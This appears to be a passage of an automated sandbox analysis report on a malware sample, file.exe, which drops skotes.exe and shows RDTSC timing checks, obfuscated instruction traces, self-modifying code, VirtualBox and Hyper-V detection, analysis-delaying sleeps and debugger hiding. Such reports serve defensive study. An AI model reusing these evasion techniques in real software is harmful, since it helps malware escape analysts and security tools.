                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360A0A second address: 5360A7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 334E00FBh 0x00000008 push ecx 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e jmp 00007FD2884F85CAh 0x00000013 mov esi, dword ptr [ebp+08h] 0x00000016 jmp 00007FD2884F85D0h 0x0000001b sub ebx, ebx 0x0000001d pushad 0x0000001e mov dx, 6042h 0x00000022 pushfd 0x00000023 jmp 00007FD2884F85D3h 0x00000028 sub ch, 0000003Eh 0x0000002b jmp 00007FD2884F85D9h 0x00000030 popfd 0x00000031 popad 0x00000032 test esi, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FD2884F85CDh 0x0000003b rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360A7F second address: 5360AB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD2FAD0A360h 0x0000000f jmp 00007FD288CC4A6Eh 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e mov esi, 056503F3h 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360C3A second address: 5360C59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+10h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov si, 8D59h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360CB3 second address: 5360CC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360CC2 second address: 5360CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5360CC8 second address: 5360CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5370C9F second address: 5370CA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5370CA5 second address: 5370CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53709E6 second address: 53709EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53709EA second address: 53709F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53709F0 second address: 53709F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53709F6 second address: 53709FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E0B79 second address: 53E0B98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 1Ch 0x00000005 mov ebx, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FD2884F85CDh 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E0B98 second address: 53E0B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E0B9C second address: 53E0BAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E0BAF second address: 53E0BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD288CC4A74h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E005D second address: 53E0061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E0061 second address: 53E0070 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E0070 second address: 53E00D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 2AE052DAh 0x00000008 push edi 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FD2884F85D3h 0x00000016 xor ecx, 2BDF052Eh 0x0000001c jmp 00007FD2884F85D9h 0x00000021 popfd 0x00000022 call 00007FD2884F85D0h 0x00000027 mov si, E9C1h 0x0000002b pop ecx 0x0000002c popad 0x0000002d pop ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E00D1 second address: 53E00D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E00D5 second address: 53E00D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E00D9 second address: 53E00DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E00DF second address: 53E00E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5380014 second address: 5380028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD288CC4A70h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5380028 second address: 538002C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 538002C second address: 538006D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD288CC4A79h 0x00000012 or si, 2BF6h 0x00000017 jmp 00007FD288CC4A71h 0x0000001c popfd 0x0000001d mov di, si 0x00000020 popad 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 538006D second address: 5380089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2884F85D8h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5380089 second address: 538008D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 538008D second address: 53800CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FD2884F85D7h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 mov dh, ah 0x00000015 jmp 00007FD2884F85D1h 0x0000001a popad 0x0000001b pop ebp 0x0000001c pushad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E02F7 second address: 53E02FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E02FD second address: 53E034B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, E263h 0x00000007 pushfd 0x00000008 jmp 00007FD2884F85D8h 0x0000000d or ax, B0A8h 0x00000012 jmp 00007FD2884F85CBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push dword ptr [ebp+0Ch] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD2884F85D5h 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E034B second address: 53E03D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD288CC4A77h 0x00000009 sbb ax, F34Eh 0x0000000e jmp 00007FD288CC4A79h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FD288CC4A76h 0x00000023 or esi, 5BAE82F8h 0x00000029 jmp 00007FD288CC4A6Bh 0x0000002e popfd 0x0000002f jmp 00007FD288CC4A78h 0x00000034 popad 0x00000035 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E03D0 second address: 53E03D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E03D6 second address: 53E03DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E03DA second address: 53E040F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 9DC6C9E1h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD2884F85D9h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E040F second address: 53E0413 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E0413 second address: 53E0419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E045F second address: 53E0465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53E0465 second address: 53E0469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D5BBA4 second address: D5BBAE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD288CC4A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 539046F second address: 539048C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 539048C second address: 539050C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD288CC4A77h 0x00000008 call 00007FD288CC4A78h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 jmp 00007FD288CC4A6Eh 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007FD288CC4A70h 0x0000001f mov ebp, esp 0x00000021 jmp 00007FD288CC4A70h 0x00000026 push FFFFFFFEh 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b call 00007FD288CC4A6Dh 0x00000030 pop eax 0x00000031 mov esi, ebx 0x00000033 popad 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 539050C second address: 5390587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD2884F85D8h 0x00000008 call 00007FD2884F85D2h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push 22A48DA0h 0x00000016 jmp 00007FD2884F85CEh 0x0000001b xor dword ptr [esp], 55E54DB8h 0x00000022 jmp 00007FD2884F85D0h 0x00000027 call 00007FD2884F85C9h 0x0000002c jmp 00007FD2884F85D0h 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390587 second address: 539058B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 539058B second address: 5390591 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390591 second address: 5390597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390597 second address: 539059B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 539059B second address: 539059F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 539059F second address: 53905BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FD2884F85CCh 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov ch, bl 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53905BE second address: 539068E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD288CC4A78h 0x00000008 sbb cx, DC08h 0x0000000d jmp 00007FD288CC4A6Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FD288CC4A78h 0x0000001b and esi, 46F7FE68h 0x00000021 jmp 00007FD288CC4A6Bh 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c pushad 0x0000002d call 00007FD288CC4A6Fh 0x00000032 mov ah, 9Bh 0x00000034 pop edi 0x00000035 mov ax, 0561h 0x00000039 popad 0x0000003a pop eax 0x0000003b pushad 0x0000003c mov ah, FFh 0x0000003e pushfd 0x0000003f jmp 00007FD288CC4A6Fh 0x00000044 jmp 00007FD288CC4A73h 0x00000049 popfd 0x0000004a popad 0x0000004b mov eax, dword ptr fs:[00000000h] 0x00000051 pushad 0x00000052 jmp 00007FD288CC4A74h 0x00000057 mov si, 7B21h 0x0000005b popad 0x0000005c nop 0x0000005d pushad 0x0000005e mov esi, 11066D59h 0x00000063 push eax 0x00000064 push ebx 0x00000065 pop eax 0x00000066 pop ebx 0x00000067 popad 0x00000068 push eax 0x00000069 pushad 0x0000006a pushad 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 539068E second address: 53906A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, dx 0x00000007 popad 0x00000008 pushad 0x00000009 mov bh, 44h 0x0000000b mov di, ax 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53906A3 second address: 53906D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FD288CC4A70h 0x00000009 pop eax 0x0000000a popad 0x0000000b movsx ebx, cx 0x0000000e popad 0x0000000f sub esp, 1Ch 0x00000012 jmp 00007FD288CC4A6Ah 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53906D1 second address: 53906D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53906D5 second address: 53906DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53906DB second address: 5390703 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx edx, ax 0x0000000e mov dx, cx 0x00000011 popad 0x00000012 xchg eax, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390703 second address: 5390707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390707 second address: 539070B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 539070B second address: 5390711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390711 second address: 539078B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007FD2884F85CEh 0x00000010 mov ecx, 1F2154F1h 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 mov cx, dx 0x0000001b pushfd 0x0000001c jmp 00007FD2884F85D9h 0x00000021 adc ecx, 252D6A36h 0x00000027 jmp 00007FD2884F85D1h 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FD2884F85CDh 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 539078B second address: 53907B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD288CC4A6Dh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53907B0 second address: 5390804 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD2884F85D1h 0x0000000f xchg eax, edi 0x00000010 jmp 00007FD2884F85CEh 0x00000015 mov eax, dword ptr [7743B370h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD2884F85D7h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390804 second address: 5390858 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD288CC4A6Fh 0x00000009 or ax, 883Eh 0x0000000e jmp 00007FD288CC4A79h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xor dword ptr [ebp-08h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD288CC4A76h 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390858 second address: 539085C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 539085C second address: 5390862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5390862 second address: 53908B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, ebp 0x0000000b pushad 0x0000000c movsx edx, cx 0x0000000f call 00007FD2884F85D8h 0x00000014 jmp 00007FD2884F85D2h 0x00000019 pop ecx 0x0000001a popad 0x0000001b push esp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ecx, edi 0x00000021 mov edi, 6121B7CAh 0x00000026 popad 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53908B2 second address: 53908B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: BAEADB instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: BAEB9F instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D5672C instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: DDAAA0 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Special instruction interceptor: First address: DCEADB instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Special instruction interceptor: First address: DCEB9F instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Special instruction interceptor: First address: F7672C instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Special instruction interceptor: First address: FFAAA0 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_053E0291 rdtsc 0_2_053E0291
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread delayed: delay time: 180000
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Window / User API: threadDelayed 454
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3968 | Thread sleep time: -42021s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6044 | Thread sleep count: 51 > 30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6044 | Thread sleep time: -102051s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1492 | Thread sleep count: 42 > 30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1492 | Thread sleep time: -84042s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5648 | Thread sleep count: 454 > 30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5648 | Thread sleep time: -13620000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3460 | Thread sleep time: -180000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6368 | Thread sleep count: 41 > 30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6368 | Thread sleep time: -82041s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5648 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\file.exe | File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread delayed: delay time: 30000
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread delayed: delay time: 180000
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread delayed: delay time: 30000
                    Source: skotes.exe, 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: skotes.exe, 00000006.00000002.3380064228.00000000014A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: file.exe, 00000000.00000002.2193792120.0000000000D2C000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2228849443.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2235071091.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: skotes.exe, 00000006.00000002.3380064228.000000000146A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: skotes.exe, 00000006.00000002.3380064228.00000000014A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW=lBR
                    Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                    Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
